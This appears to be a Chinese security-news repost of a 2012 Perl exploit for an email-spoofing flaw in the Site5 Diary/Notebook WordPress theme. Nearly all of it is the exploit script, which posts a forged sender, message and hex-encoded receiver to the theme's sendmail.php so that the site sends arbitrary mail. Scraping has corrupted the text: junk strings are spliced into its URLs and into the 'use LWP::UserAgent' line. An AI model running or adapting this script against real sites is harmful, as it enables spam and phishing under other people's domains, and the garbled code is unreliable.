WordPress的这款Diary/Notebook主题是有site5设计的一款个人日记blog系统主题.近期爆出了邮件欺骗的漏洞.附上perl脚本的Exp: #!/usr/bin/perl # Exploit Title: Diary/Notebook Site5 WordPress Theme - Email Spoofing # Date: 15.07.2012 # Exploit Author: @bwallHatesTwits # Discovered by: @xxDigiPxx (http://HdhCmsTestticktockcomputers测试数据/wordpress/site5-wordpress-theme-diary-sendmail-php-spoofing/) # Software Link: http://HdhCmsTestwpdiarytheme测试数据/ # Vendor Homepage: http://HdhCmsTestsite5测试数据/ # Others Possibly Vulnerable: http://HdhCmsTestsite5测试数据/wordpress-themes/ # Version: Not Documented # Tested on: Linux 3.2 use strict; use warnings; HdhCmsTest2cto测试数据 use L WP ::UserAgent; use HTTP::Request::Common qw{ POST }; #Change this to the root of the WordPress my $wordpress = 'http://localhost/wordpress/'; my $url = $wordpress.'wp-content/themes/diary/sendmail.php'; #Name shows up in the topic of the email (Website contact message from name) my $name ='Proof of Concept'; #Sender email address my $email = 'sender@mail测试数据'; #Content of the email my $comment = 'Email content'; #Receiver email address my $receiver = 'receiver@mail测试数据'; $receiver =~ s/(.)/sprintf("%x",ord($1))/eg; my $ua = LWP::UserAgent->new(); my $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => 'submit', ] ); print "Sending request to $url\n"; my $content = $ua->request($request)->as_string(); print $content; print "\nDone\nFollow \@BallastSec on Twitter\n"; 作者 牛X阿德玛
查看更多关于wordpress Diary/Notebook主题邮件欺骗漏洞 - 网站安全的详细内容...